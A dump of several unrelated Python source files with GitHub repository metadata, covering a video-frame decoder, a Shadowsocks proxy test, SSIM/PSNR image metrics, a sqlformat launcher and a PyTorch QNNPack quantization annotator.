class Cv2Decoder(Operator):
"""
Cv2 decoder
"""
def __init__(self):
super().__init__()
self.key = ()
def __call__(self, video_path: str) -> NamedTuple('Outputs', [('imgs', List['Image'])]):
Outputs = NamedTuple('Outputs', [('imgs', List['Image'])])
imgs = []
cap = cv2.VideoCapture(video_path)
while True:
_, frame = cap.read()
if frame is not None:
imgs.append(Image.fromarray(frame))
else:
cap.release()
return Outputs(imgs)
@property
def shared_type(self):
return SharedType.Shareable
| [
"noreply@github.com"
] | noreply@github.com |
b737b31bed3d603c622f9944ac103af3aedce653 | d3d4af6651c7138f9ce32ddbe95f7a6e00621398 | /small_apps/shadowsocks/test.py | 35d3fafa5c2ad7d81506c7719f12a6ce65d67835 | [] | no_license | mitnk/stuff | 13fdb6a77443e923a9cf55d0a02f405c839b204a | 0ae1d2adbcd28897277ad67bcf02997f428c0b97 | refs/heads/master | 2020-06-26T17:02:10.341565 | 2013-10-22T01:10:48 | 2013-10-22T01:10:48 | 2,129,379 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,210 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import select
import struct
import hashlib
import string
from subprocess import Popen, PIPE
target1 = [
[60, 53, 84, 138, 217, 94, 88, 23, 39, 242, 219, 35, 12, 157, 165, 181, 255, 143, 83, 247, 162, 16, 31, 209, 190,
171, 115, 65, 38, 41, 21, 245, 236, 46, 121, 62, 166, 233, 44, 154, 153, 145, 230, 49, 128, 216, 173, 29, 241, 119,
64, 229, 194, 103, 131, 110, 26, 197, 218, 59, 204, 56, 27, 34, 141, 221, 149, 239, 192, 195, 24, 155, 170, 183, 11
, 254, 213, 37, 137, 226, 75, 203, 55, 19, 72, 248, 22, 129, 33, 175, 178, 10, 198, 71, 77, 36, 113, 167, 48, 2,
117, 140, 142, 66, 199, 232, 243, 32, 123, 54, 51, 82, 57, 177, 87, 251, 150, 196, 133, 5, 253, 130, 8, 184, 14,
152, 231, 3, 186, 159, 76, 89, 228, 205, 156, 96, 163, 146, 18, 91, 132, 85, 80, 109, 172, 176, 105, 13, 50, 235,
127, 0, 189, 95, 98, 136, 250, 200, 108, 179, 211, 214, 106, 168, 78, 79, 74, 210, 30, 73, 201, 151, 208, 114, 101,
174, 92, 52, 120, 240, 15, 169, 220, 182, 81, 224, 43, 185, 40, 99, 180, 17, 212, 158, 42, 90, 9, 191, 45, 6, 25, 4
, 222, 67, 126, 1, 116, 124, 206, 69, 61, 7, 68, 97, 202, 63, 244, 20, 28, 58, 93, 134, 104, 144, 227, 147, 102,
118, 135, 148, 47, 238, 86, 112, 122, 70, 107, 215, 100, 139, 223, 225, 164, 237, 111, 125, 207, 160, 187, 246, 234
, 161, 188, 193, 249, 252],
[151, 205, 99, 127, 201, 119, 199, 211, 122, 196, 91, 74, 12, 147, 124, 180, 21, 191, 138, 83, 217, 30, 86, 7, 70,
200, 56, 62, 218, 47, 168, 22, 107, 88, 63, 11, 95, 77, 28, 8, 188, 29, 194, 186, 38, 198, 33, 230, 98, 43, 148,
110, 177, 1, 109, 82, 61, 112, 219, 59, 0, 210, 35, 215, 50, 27, 103, 203, 212, 209, 235, 93, 84, 169, 166, 80, 130
, 94, 164, 165, 142, 184, 111, 18, 2, 141, 232, 114, 6, 131, 195, 139, 176, 220, 5, 153, 135, 213, 154, 189, 238
, 174, 226, 53, 222, 146, 162, 236, 158, 143, 55, 244, 233, 96, 173, 26, 206, 100, 227, 49, 178, 34, 234, 108,
207, 245, 204, 150, 44, 87, 121, 54, 140, 118, 221, 228, 155, 78, 3, 239, 101, 64, 102, 17, 223, 41, 137, 225, 229,
66, 116, 171, 125, 40, 39, 71, 134, 13, 193, 129, 247, 251, 20, 136, 242, 14, 36, 97, 163, 181, 72, 25, 144, 46,
175, 89, 145, 113, 90, 159, 190, 15, 183, 73, 123, 187, 128, 248, 252, 152, 24, 197, 68, 253, 52, 69, 117, 57, 92,
104, 157, 170, 214, 81, 60, 133, 208, 246, 172, 23, 167, 160, 192, 76, 161, 237, 45, 4, 58, 10, 182, 65, 202, 240,
185, 241, 79, 224, 132, 51, 42, 126, 105, 37, 250, 149, 32, 243, 231, 67, 179, 48, 9, 106, 216, 31, 249, 19, 85,
254, 156, 115, 255, 120, 75, 16]]
target2 = [
[124, 30, 170, 247, 27, 127, 224, 59, 13, 22, 196, 76, 72, 154, 32, 209, 4, 2, 131, 62, 101, 51, 230, 9, 166, 11, 99
, 80, 208, 112, 36, 248, 81, 102, 130, 88, 218, 38, 168, 15, 241, 228, 167, 117, 158, 41, 10, 180, 194, 50, 204,
243, 246, 251, 29, 198, 219, 210, 195, 21, 54, 91, 203, 221, 70, 57, 183, 17, 147, 49, 133, 65, 77, 55, 202, 122,
162, 169, 188, 200, 190, 125, 63, 244, 96, 31, 107, 106, 74, 143, 116, 148, 78, 46, 1, 137, 150, 110, 181, 56, 95,
139, 58, 3, 231, 66, 165, 142, 242, 43, 192, 157, 89, 175, 109, 220, 128, 0, 178, 42, 255, 20, 214, 185, 83, 160,
253, 7, 23, 92, 111, 153, 26, 226, 33, 176, 144, 18, 216, 212, 28, 151, 71, 206, 222, 182, 8, 174, 205, 201, 152,
240, 155, 108, 223, 104, 239, 98, 164, 211, 184, 34, 193, 14, 114, 187, 40, 254, 12, 67, 93, 217, 6, 94, 16, 19, 82
, 86, 245, 24, 197, 134, 132, 138, 229, 121, 5, 235, 238, 85, 47, 103, 113, 179, 69, 250, 45, 135, 156, 25, 61,
75, 44, 146, 189, 84, 207, 172, 119, 53, 123, 186, 120, 171, 68, 227, 145, 136, 100, 90, 48, 79, 159, 149, 39, 213,
236, 126, 52, 60, 225, 199, 105, 73, 233, 252, 118, 215, 35, 115, 64, 37, 97, 129, 161, 177, 87, 237, 141, 173, 191
, 163, 140, 234, 232, 249],
[117, 94, 17, 103, 16, 186, 172, 127, 146, 23, 46, 25, 168, 8, 163, 39, 174, 67, 137, 175, 121, 59, 9, 128, 179, 199
, 132, 4, 140, 54, 1, 85, 14, 134, 161, 238, 30, 241, 37, 224, 166, 45, 119, 109, 202, 196, 93, 190, 220, 69, 49
, 21, 228, 209, 60, 73, 99, 65, 102, 7, 229, 200, 19, 82, 240, 71, 105, 169, 214, 194, 64, 142, 12, 233, 88, 201
, 11, 72, 92, 221, 27, 32, 176, 124, 205, 189, 177, 246, 35, 112, 219, 61, 129, 170, 173, 100, 84, 242, 157, 26,
218, 20, 33, 191, 155, 232, 87, 86, 153, 114, 97, 130, 29, 192, 164, 239, 90, 43, 236, 208, 212, 185, 75, 210, 0,
81, 227, 5, 116, 243, 34, 18, 182, 70, 181, 197, 217, 95, 183, 101, 252, 248, 107, 89, 136, 216, 203, 68, 91, 223,
96, 141, 150, 131, 13, 152, 198, 111, 44, 222, 125, 244, 76, 251, 158, 106, 24, 42, 38, 77, 2, 213, 207, 249, 147,
113, 135, 245, 118, 193, 47, 98, 145, 66, 160, 123, 211, 165, 78, 204, 80, 250, 110, 162, 48, 58, 10, 180, 55, 231,
79, 149, 74, 62, 50, 148, 143, 206, 28, 15, 57, 159, 139, 225, 122, 237, 138, 171, 36, 56, 115, 63, 144, 154, 6,
230, 133, 215, 41, 184, 22, 104, 254, 234, 253, 187, 226, 247, 188, 156, 151, 40, 108, 51, 83, 178, 52, 3, 31, 255,
195, 53, 235, 126, 167, 120]]
def get_table(key):
m = hashlib.md5()
m.update(key)
s = m.digest()
(a, b) = struct.unpack('<QQ', s)
table = [c for c in string.maketrans('', '')]
for i in xrange(1, 1024):
table.sort(lambda x, y: int(a % (ord(x) + i) - a % (ord(y) + i)))
return table
encrypt_table = ''.join(get_table('foobar!'))
decrypt_table = string.maketrans(encrypt_table, string.maketrans('', ''))
for i in range(0, 256):
assert(target1[0][i] == ord(encrypt_table[i]))
assert(target1[1][i] == ord(decrypt_table[i]))
encrypt_table = ''.join(get_table('barfoo!'))
decrypt_table = string.maketrans(encrypt_table, string.maketrans('', ''))
for i in range(0, 256):
assert(target2[0][i] == ord(encrypt_table[i]))
assert(target2[1][i] == ord(decrypt_table[i]))
p1 = Popen(['python', 'server.py'], shell=False, bufsize=0, stdin=PIPE,
stdout=PIPE, stderr=PIPE, close_fds=True)
p2 = Popen(['python', 'local.py'], shell=False, bufsize=0, stdin=PIPE,
stdout=PIPE, stderr=PIPE, close_fds=True)
p3 = None
print 'encryption test passed'
try:
ready_count = 0
fdset = [p1.stdout, p2.stdout, p1.stderr, p2.stderr]
while True:
r, w, e = select.select(fdset, [], fdset)
if e:
break
for fd in r:
line = fd.readline()
sys.stdout.write(line)
if line.find('starting server at port') >= 0:
ready_count += 1
if ready_count == 2 and p3 is None:
p3 = Popen(['curl', 'http://www.example.com/', '-v', '-L',
'--socks5-hostname', '127.0.0.1:1080'], shell=False,
bufsize=0, close_fds=True)
break
if p3 is not None:
r = p3.wait()
if r == 0:
print 'test passed'
sys.exit(r)
finally:
for p in [p1, p2]:
try:
p.kill()
except OSError:
pass
sys.exit(-1)
| [
"whgking@gmail.com"
] | whgking@gmail.com |
bc17a9d243eee1fad950c7533e64a53420bef524 | 63c446e6ca949540d96bb8ebaecb48d68d6f933e | /evaluation.py | 67d5454dc5faa2019f32b91a850886f69ff4226e | [] | no_license | scott-mao/MMNet | 5dcb54aa26f483a474c4909fa27c6061c6540af5 | 29a39094d5ff8ee1ae24e09d22b77b6fa92d3fa2 | refs/heads/main | 2023-03-26T09:03:17.103023 | 2021-03-29T01:39:45 | 2021-03-29T01:39:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,828 | py | import torch
import torch.nn.functional as F
from torch.autograd import Variable
import numpy as np
from math import exp
from math import log10
def gaussian(window_size, sigma):
gauss = torch.Tensor([exp(-(x - window_size // 2) ** 2 / float(2 * sigma ** 2)) for x in range(window_size)])
return gauss / gauss.sum()
def create_window(window_size, channel):
_1D_window = gaussian(window_size, 1.5).unsqueeze(1)
_2D_window = _1D_window.mm(_1D_window.t()).float().unsqueeze(0).unsqueeze(0)
window = Variable(_2D_window.expand(channel, 1, window_size, window_size).contiguous())
return window
def _ssim(img1, img2, window, window_size, channel, size_average=True):
mu1 = F.conv2d(img1, window, padding=window_size // 2, groups=channel)
mu2 = F.conv2d(img2, window, padding=window_size // 2, groups=channel)
mu1_sq = mu1.pow(2)
mu2_sq = mu2.pow(2)
mu1_mu2 = mu1 * mu2
sigma1_sq = F.conv2d(img1 * img1, window, padding=window_size // 2, groups=channel) - mu1_sq
sigma2_sq = F.conv2d(img2 * img2, window, padding=window_size // 2, groups=channel) - mu2_sq
sigma12 = F.conv2d(img1 * img2, window, padding=window_size // 2, groups=channel) - mu1_mu2
C1 = 0.01 ** 2
C2 = 0.03 ** 2
ssim_map = ((2 * mu1_mu2 + C1) * (2 * sigma12 + C2)) / ((mu1_sq + mu2_sq + C1) * (sigma1_sq + sigma2_sq + C2))
if size_average:
return ssim_map.mean()
else:
return ssim_map.mean(1).mean(1).mean(1)
def _binarize(y_data, threshold):
y_data[y_data < threshold] = 0.0
y_data[y_data >= threshold] = 1.0
return y_data
'''
def psnr(y_pred, y_true, dim=1, threshold=None):
if threshold:
y_pred = _binarize(y_pred, threshold)
mse = torch.mean((y_pred - y_true) ** 2)
psnr=10 * torch.log10(1 / mse)
return psnr.cpu().data.numpy'''
def ssim(img1, img2, window_size=11, size_average=False):
_, channel, h, w = img1.size()
img1_ = img1[:, :, 8: -8, 8: -8]
img2_ = img2[:, :, 8: -8, 8: -8]
window = create_window(window_size, channel)
if img1.is_cuda:
window = window.cuda(img1_.get_device())
window = window.type_as(img1_)
return _ssim(img1_, img2_, window, window_size, channel, size_average)
def psnr(img1, img2):
img1 = (img1 * 255.0).int()
img2 = (img2 * 255.0).int()
img1 = img1.float() / 255.0
img2 = img2.float() / 255.0
mse = torch.mean((img1 - img2) ** 2)
psnr = 10 * log10(1 / mse)
return psnr
def psnr2(img1, img2):
img1 = (img1 * 255.0).int()
img2 = (img2 * 255.0).int()
img1 = img1.float() / 255.0
img2 = img2.float() / 255.0
img1_ = img1[:, :, 8: -8, 8: -8]
img2_ = img2[:, :, 8: -8, 8: -8]
mse = torch.sum((img1_ - img2_) ** 2, [1, 2, 3]) / img1_[0, ...].numel()
out = 10 * torch.log10(1 / mse)
return out
| [
"anchen@mail.ustc.edu.cn"
] | anchen@mail.ustc.edu.cn |
3b603298800ea6f63d1d96d118d1723a81b7ee5d | c938d327ae20123ae0947e8f0a14e295bf93ed4e | /virtual/bin/sqlformat | 1c8fd84119a939063491ebcf81c981ad76ca49de | [
"MIT"
] | permissive | Kennedy-karuri/Awards | 54a4c5ef975cfb7fb757f56eee449cd5b850aa8d | 833ecad6e9d491a10b61a733a4c2f0b31d0b8b00 | refs/heads/master | 2023-02-28T09:35:21.111483 | 2021-01-26T23:22:19 | 2021-01-26T23:22:19 | 332,387,517 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 253 | #!/home/moringaaccess/Desktop/awards/virtual/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from sqlparse.__main__ import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"kennkaruri99@gmail.com"
] | kennkaruri99@gmail.com | |
a2bd66f70a6a7d7e1b9e8f3c16a7f2d37623a9d3 | 7ed4a49fd0906ed156c1846c9c9fc1dd94c47303 | /torch/ao/quantization/_pt2e/quantizer/qnnpack_quantizer.py | 10880f20705bdbe4aa55d8602e9370acf9c72230 | [
"BSD-2-Clause",
"LicenseRef-scancode-secret-labs-2011",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"BSL-1.0",
"Apache-2.0"
] | permissive | XinYao1994/pytorch | e052f2f44acf623da9d5ebc6b46f68311e73d66a | 351c2ea2fbb09add93980e2942435f31b114047c | refs/heads/master | 2023-05-27T17:20:51.876780 | 2023-05-21T06:31:53 | 2023-05-21T06:31:53 | 153,064,994 | 1 | 0 | null | 2018-10-15T06:42:28 | 2018-10-15T06:42:28 | null | UTF-8 | Python | false | false | 25,134 | py | from __future__ import annotations
import copy
import functools
import operator
from typing import Callable, Dict, List, Optional, Set
import torch
import torch._dynamo as torchdynamo
import torch.nn.functional as F
from torch.ao.quantization._pt2e.quantizer.utils import (
get_act_obs_or_fq_ctr,
get_bias_obs_or_fq_ctr,
get_weight_obs_or_fq_ctr,
)
from torch.ao.quantization.observer import PlaceholderObserver
from torch.fx import Node
from torch.fx.passes.utils.source_matcher_utils import get_source_partitions
from .quantizer import (
OperatorConfig,
OperatorPatternType,
QuantizationConfig,
QuantizationSpec,
Quantizer,
QuantizationAnnotation,
_annotate_input_qspec_map,
_annotate_output_qspec,
)
__all__ = [
"QNNPackQuantizer",
"get_symmetric_quantization_config",
]
_QUANT_CONFIG_TO_ANNOTATOR = {}
def _mark_nodes_as_annotated(nodes: List[Node]):
for node in nodes:
if node is not None:
if "quantization_annotation" not in node.meta:
node.meta["quantization_annotation"] = QuantizationAnnotation()
node.meta["quantization_annotation"]._annotated = True
def _get_dynamo_graph(function: Callable, inputs) -> torch.fx.Graph:
gm, _ = torchdynamo.export(function, *inputs, aten_graph=True)
gm.graph.eliminate_dead_code()
return gm.graph
def _get_linear_patterns(input_size: List[int]):
in_channels = input_size[-1]
out_channels = 8 # hard coding but this should not matter
weight = torch.ones((out_channels, in_channels))
bias = torch.ones((out_channels,))
act = torch.ones(input_size)
def linear_op(act, weight, bias=None):
return F.linear(act, weight, bias)
pattern_w_bias = _get_dynamo_graph(linear_op, (act, weight, bias))
pattern_wo_bias = _get_dynamo_graph(linear_op, (act, weight))
return [pattern_w_bias, pattern_wo_bias]
def register_annotator(quantization_configs: List[QuantizationConfig]):
def decorator(fn: Callable):
for quantization_config in quantization_configs:
if quantization_config in _QUANT_CONFIG_TO_ANNOTATOR:
raise KeyError(
f"Annotator for quantization config {quantization_config} is already registered"
)
_QUANT_CONFIG_TO_ANNOTATOR[quantization_config] = functools.partial(
fn, config=quantization_config
)
return decorator
def supported_symmetric_quantized_operators() -> Dict[str, List[OperatorPatternType]]:
supported_operators: Dict[str, List[OperatorPatternType]] = {
# Both conv and linear should be able to handle relu + hardtanh fusion since
# those are clamp ops
"conv2d": [
[torch.nn.Conv2d, torch.nn.ReLU],
[torch.nn.Conv2d, F.relu],
[F.conv2d, torch.nn.ReLU],
[F.conv2d, F.relu],
],
"linear": [[torch.nn.Linear], [F.linear]],
"add": [[torch.add]],
"maxpool2d": [[torch.nn.MaxPool2d], [F.max_pool2d]],
"hardtanh": [[torch.nn.Hardtanh], [F.hardtanh]],
"mean": [[torch.mean]],
"adaptive_avgpool2d": [
[torch.nn.AdaptiveAvgPool2d],
[F.adaptive_avg_pool2d],
],
}
return copy.deepcopy(supported_operators)
def get_supported_symmetric_config_and_operators() -> List[OperatorConfig]:
supported_config_and_operators: List[OperatorConfig] = []
for quantization_config in [
get_symmetric_quantization_config(),
get_symmetric_quantization_config(is_qat=True),
get_symmetric_quantization_config(is_per_channel=True),
get_symmetric_quantization_config(is_per_channel=True, is_qat=True),
]:
ops = supported_symmetric_quantized_operators()
for op_string, pattern_list in ops.items():
supported_config_and_operators.append(
OperatorConfig(quantization_config, pattern_list)
)
return copy.deepcopy(supported_config_and_operators)
@functools.lru_cache
def get_symmetric_quantization_config(
is_per_channel: bool = False,
is_qat: bool = False,
):
act_quantization_spec = QuantizationSpec(
dtype=torch.int8,
quant_min=-128,
quant_max=127,
qscheme=torch.per_tensor_affine,
is_dynamic=False,
)
qscheme = (
torch.per_channel_symmetric if is_per_channel else torch.per_tensor_symmetric
)
weight_quantization_spec = QuantizationSpec(
dtype=torch.int8,
quant_min=-127,
quant_max=127,
qscheme=qscheme,
ch_axis=0,
is_dynamic=False,
)
bias_quantization_spec = QuantizationSpec(dtype=torch.float)
quantization_config = QuantizationConfig(
act_quantization_spec, weight_quantization_spec, bias_quantization_spec, is_qat
)
return quantization_config
def get_supported_config_and_operators() -> List[OperatorConfig]:
return get_supported_symmetric_config_and_operators()
def _get_default_obs_or_fq_ctr():
return PlaceholderObserver.with_args(dtype=torch.float)
def _is_annotated(nodes: List[Node]):
"""
Given a list of nodes (that represents an operator pattern),
check if any of the node is annotated, return True if any of the node
is annotated, otherwise return False
"""
annotated = False
for node in nodes:
annotated = annotated or (
"quantization_annotation" in node.meta
and node.meta["quantization_annotation"]._annotated
)
return annotated
class QNNPackQuantizer(Quantizer):
supported_config_and_operators = get_supported_config_and_operators()
def __init__(self):
super().__init__()
self.global_config: QuantizationConfig = None # type: ignore[assignment]
self.operator_type_config: Dict[str, Optional[QuantizationConfig]] = {}
@classmethod
def get_supported_quantization_configs(cls) -> List[QuantizationConfig]:
op_configs: Set[QuantizationConfig] = set({})
for spec, _ in cls.supported_config_and_operators:
op_configs.add(spec)
return list(op_configs)
@classmethod
def get_supported_operator_for_quantization_config(
cls, quantization_config: Optional[QuantizationConfig]
) -> List[OperatorPatternType]:
if quantization_config is None:
all_ops = []
for _, ops in cls.supported_config_and_operators:
all_ops.extend(ops)
return all_ops
for config, ops in cls.supported_config_and_operators:
# note: this assumes each entry in cls.supported_spec_and_operators
# corresponds to one spec, e.g. we don't have
# [(spec1, op_list1), (spec1, op_list2), (spec2, op_list3)]
# where the first and second entry have the same spec but did not
# merge the op list
if config == quantization_config:
return ops
return []
def set_global(self, quantization_config: QuantizationConfig) -> QNNPackQuantizer:
self.global_config = quantization_config
return self
def set_config_for_operator_type(
self, operator_type: str, quantization_config: QuantizationConfig
) -> QNNPackQuantizer:
self.operator_type_config[operator_type] = quantization_config
return self
def annotate(self, model: torch.fx.GraphModule) -> torch.fx.GraphModule:
"""just handling global spec for now"""
global_config = self.global_config
_QUANT_CONFIG_TO_ANNOTATOR[global_config](self, model)
return model
@register_annotator(
[
get_symmetric_quantization_config(is_per_channel=False, is_qat=False),
get_symmetric_quantization_config(is_per_channel=False, is_qat=True),
get_symmetric_quantization_config(is_per_channel=True, is_qat=True),
get_symmetric_quantization_config(is_per_channel=True, is_qat=False),
]
)
def annotate_symmetric_config(
self, model: torch.fx.GraphModule, config: QuantizationConfig
) -> torch.fx.GraphModule:
# annotate the nodes from last to first since the matching is in the reversed order
# and fusion operator patterns (conv - relu) can get matched before single operator pattern (conv)
# and we will mark the matched node with "_annoated" so fusion operator pattern
# can take precedence over single operator pattern in this way
self._annotate_linear(model, config)
for node in reversed(model.graph.nodes):
# one improvement is to register node annotators for each
# supported op type.
if config.is_qat:
self._annotate_conv2d_bn_relu(node, config)
self._annotate_conv2d_bn(node, config)
self._annotate_conv2d_relu(node, config)
self._annotate_conv2d(node, config)
self._annotate_maxpool2d(node, config)
self._annotate_add_relu(node, config)
self._annotate_add(node, config)
self._annotate_hardtanh(node, config)
self._annotate_mean(node, config)
self._annotate_adaptive_avg_pool2d(node, config)
return model
def _annotate_conv2d_bn(
self, node: Node, quantization_config: QuantizationConfig
) -> None:
"""
Match the following pattern:
... -> conv -> bn -> getitem[0] -> ...
Annotate it to get the following pattern after prepare:
weight -> fq1
|
... -> fq0 -> conv -> bn -> getitem[0] -> fq2 -> ...
Note: This is only used for QAT. In PTQ, batchnorm should already be fused into the conv.
"""
if (
node.op != "call_function"
or node.target != operator.getitem
or node.args[1] != 0
):
return
getitem_node = node
bn_node = getitem_node.args[0]
assert isinstance(bn_node, Node)
if (
bn_node.op != "call_function"
or bn_node.target != torch.ops.aten._native_batch_norm_legit.default
):
return
conv_node = bn_node.args[0]
assert isinstance(conv_node, Node)
if (
conv_node.op != "call_function"
or conv_node.target != torch.ops.aten.convolution.default
):
return
if _is_annotated([getitem_node, bn_node, conv_node]):
return
input_qspec_map = {}
input_act = conv_node.args[0]
assert isinstance(input_act, Node)
input_qspec_map[input_act] = get_act_obs_or_fq_ctr(quantization_config)
weight = conv_node.args[1]
assert isinstance(weight, Node)
input_qspec_map[weight] = get_weight_obs_or_fq_ctr(quantization_config)
bias = conv_node.args[2]
if isinstance(bias, Node):
input_qspec_map[bias] = get_bias_obs_or_fq_ctr(quantization_config)
conv_node.meta["quantization_annotation"] = QuantizationAnnotation(
input_qspec_map=input_qspec_map,
_annotated=True
)
bn_node.meta["quantization_annotation"] = QuantizationAnnotation(
_annotated=True
)
getitem_node.meta["quantization_annotation"] = QuantizationAnnotation(
output_qspec=get_act_obs_or_fq_ctr(quantization_config), # type: ignore[arg-type]
_annotated=True
)
def _annotate_conv2d_bn_relu(
self, node: Node, quantization_config: QuantizationConfig
) -> None:
"""
Match the following pattern:
... -> conv -> bn -> getitem[0] -> relu -> ...
Annotate it to get the following pattern after prepare:
weight -> fq1
|
... -> fq0 -> conv -> bn -> getitem[0] -> relu -> fq2 -> ...
Note: This is only used for QAT. In PTQ, batchnorm should already be fused into the conv.
"""
if node.op != "call_function" or node.target not in [
torch.ops.aten.relu_.default,
torch.ops.aten.relu.default,
]:
return
relu_node = node
getitem_node = relu_node.args[0]
assert isinstance(getitem_node, Node)
if (
getitem_node.op != "call_function"
or getitem_node.target != operator.getitem
or getitem_node.args[1] != 0
):
return
bn_node = getitem_node.args[0]
assert isinstance(bn_node, Node)
if (
bn_node.op != "call_function"
or bn_node.target != torch.ops.aten._native_batch_norm_legit.default
):
return
conv_node = bn_node.args[0]
assert isinstance(conv_node, Node)
if (
conv_node.op != "call_function"
or conv_node.target != torch.ops.aten.convolution.default
):
return
if _is_annotated([relu_node, getitem_node, bn_node, conv_node]):
return
input_qspec_map = {}
input_act = conv_node.args[0]
assert isinstance(input_act, Node)
input_qspec_map[input_act] = get_act_obs_or_fq_ctr(quantization_config)
weight = conv_node.args[1]
assert isinstance(weight, Node)
input_qspec_map[weight] = get_weight_obs_or_fq_ctr(quantization_config)
bias = conv_node.args[2]
if isinstance(bias, Node):
input_qspec_map[bias] = get_bias_obs_or_fq_ctr(quantization_config)
conv_node.meta["quantization_annotation"] = QuantizationAnnotation(
input_qspec_map=input_qspec_map,
_annotated=True
)
bn_node.meta["quantization_annotation"] = QuantizationAnnotation(
_annotated=True
)
getitem_node.meta["quantization_annotation"] = QuantizationAnnotation(
_annotated=True
)
relu_node.meta["quantization_annotation"] = QuantizationAnnotation(
output_qspec=get_act_obs_or_fq_ctr(quantization_config), # type: ignore[arg-type]
_annotated=True
)
def _annotate_conv2d_relu(
self, node: Node, quantization_config: QuantizationConfig
) -> None:
if node.op != "call_function" or node.target not in [
torch.ops.aten.relu_.default,
torch.ops.aten.relu.default,
]:
return
relu_node = node
conv_node = relu_node.args[0]
assert isinstance(conv_node, Node)
if (
conv_node.op != "call_function"
or conv_node.target != torch.ops.aten.convolution.default
):
return
if _is_annotated([relu_node, conv_node]):
return
input_qspec_map = {}
input_act = conv_node.args[0]
assert isinstance(input_act, Node)
input_qspec_map[input_act] = get_act_obs_or_fq_ctr(quantization_config)
weight = conv_node.args[1]
assert isinstance(weight, Node)
input_qspec_map[weight] = get_weight_obs_or_fq_ctr(quantization_config)
bias = conv_node.args[2]
if isinstance(bias, Node):
input_qspec_map[bias] = get_bias_obs_or_fq_ctr(quantization_config)
conv_node.meta["quantization_annotation"] = QuantizationAnnotation(
input_qspec_map=input_qspec_map,
_annotated=True
)
relu_node.meta["quantization_annotation"] = QuantizationAnnotation(
output_qspec=get_act_obs_or_fq_ctr(quantization_config), # type: ignore[arg-type]
_annotated=True
)
def _annotate_conv2d(
self, node: Node, quantization_config: QuantizationConfig
) -> None:
conv_node = node
if (
conv_node.op != "call_function"
or conv_node.target != torch.ops.aten.convolution.default
):
return
# skip annotation if it is already annotated
if _is_annotated([conv_node]):
return
input_qspec_map = {}
input_act = conv_node.args[0]
assert isinstance(input_act, Node)
input_qspec_map[input_act] = get_act_obs_or_fq_ctr(quantization_config)
weight = conv_node.args[1]
assert isinstance(weight, Node)
input_qspec_map[weight] = get_weight_obs_or_fq_ctr(quantization_config)
bias = conv_node.args[2]
if isinstance(bias, Node):
input_qspec_map[bias] = get_bias_obs_or_fq_ctr(quantization_config)
conv_node.meta["quantization_annotation"] = QuantizationAnnotation(
input_qspec_map=input_qspec_map,
output_qspec=get_act_obs_or_fq_ctr(quantization_config),
_annotated=True
)
def _annotate_linear(
self, gm: torch.fx.GraphModule, quantization_config: QuantizationConfig
) -> None:
module_partitions = get_source_partitions(
gm.graph, [torch.nn.Linear, torch.nn.functional.linear]
)
for module_or_fn_type, partitions in module_partitions.items():
if module_or_fn_type == torch.nn.Linear:
for p in partitions:
act_node = p.input_nodes[0]
output_node = p.output_nodes[0]
weight_node = None
bias_node = None
for node in p.params:
weight_or_bias = getattr(gm, node.target) # type: ignore[arg-type]
if weight_or_bias.ndim == 2: # type: ignore[attr-defined]
weight_node = node
if weight_or_bias.ndim == 1: # type: ignore[attr-defined]
bias_node = node
if weight_node is None:
raise ValueError("No weight found in Linear pattern")
# find use of act node within the matched pattern
act_use_node = None
for node in p.nodes:
if node in act_node.users: # type: ignore[union-attr]
act_use_node = node
break
if act_use_node is None:
raise ValueError(
"Could not find an user of act node within matched pattern."
)
if _is_annotated([act_use_node]) is False: # type: ignore[list-item]
_annotate_input_qspec_map(
act_use_node,
act_node,
get_act_obs_or_fq_ctr(quantization_config),
)
if bias_node and _is_annotated([bias_node]) is False:
_annotate_output_qspec(
bias_node, get_bias_obs_or_fq_ctr(quantization_config)
)
if _is_annotated([weight_node]) is False: # type: ignore[list-item]
_annotate_output_qspec(
weight_node, get_weight_obs_or_fq_ctr(quantization_config)
)
if _is_annotated([output_node]) is False:
_annotate_output_qspec(
output_node, get_act_obs_or_fq_ctr(quantization_config)
)
nodes_to_mark_annotated = list(p.nodes)
_mark_nodes_as_annotated(nodes_to_mark_annotated)
# TODO: move to `_pt2e/_propagate_annotation.py` after we have
# decided on the how we want to use pattern matching for annotation
def _annotate_maxpool2d(
self, node: Node, quantization_config: QuantizationConfig
) -> None:
if (
node.op != "call_function"
or node.target != operator.getitem
or node.args[1] != 0
):
return
getitem_node = node
maxpool_node = getitem_node.args[0]
assert isinstance(maxpool_node, Node)
if (
maxpool_node.op != "call_function"
or maxpool_node.target != torch.ops.aten.max_pool2d_with_indices.default
):
return
if _is_annotated([getitem_node, maxpool_node]):
return
input_act = maxpool_node.args[0]
assert isinstance(input_act, Node)
maxpool_node.meta["quantization_annotation"] = QuantizationAnnotation(
input_qspec_map={
input_act: get_act_obs_or_fq_ctr(quantization_config)
},
_annotated=True,
)
getitem_node.meta["quantization_annotation"] = QuantizationAnnotation(
output_qspec=get_act_obs_or_fq_ctr(quantization_config),
_input_output_share_observers=True,
_annotated=True,
)
def _annotate_input_out_obs_sharing_op(
self,
op: Callable,
node: Node,
quantization_config: QuantizationConfig,
) -> None:
io_obs_sharing_node = node
if (
io_obs_sharing_node.op != "call_function"
or io_obs_sharing_node.target != op
):
return
if _is_annotated([io_obs_sharing_node]):
return
input_act = io_obs_sharing_node.args[0]
assert isinstance(input_act, Node)
io_obs_sharing_node.meta["quantization_annotation"] = QuantizationAnnotation(
input_qspec_map={
input_act: get_act_obs_or_fq_ctr(quantization_config)
},
output_qspec=get_act_obs_or_fq_ctr(quantization_config),
_input_output_share_observers=True,
_annotated=True,
)
def _annotate_hardtanh(
self, node: Node, quantization_config: QuantizationConfig
) -> None:
self._annotate_input_out_obs_sharing_op(
torch.ops.aten.hardtanh.default, node, quantization_config
)
def _annotate_mean(
self, node: Node, quantization_config: QuantizationConfig
) -> None:
self._annotate_input_out_obs_sharing_op(
torch.ops.aten.mean.default, node, quantization_config
)
self._annotate_input_out_obs_sharing_op(
torch.ops.aten.mean.dim, node, quantization_config
)
def _annotate_adaptive_avg_pool2d(
self, node: Node, quantization_config: QuantizationConfig
) -> None:
self._annotate_input_out_obs_sharing_op(
torch.ops.aten.adaptive_avg_pool2d.default, node, quantization_config
)
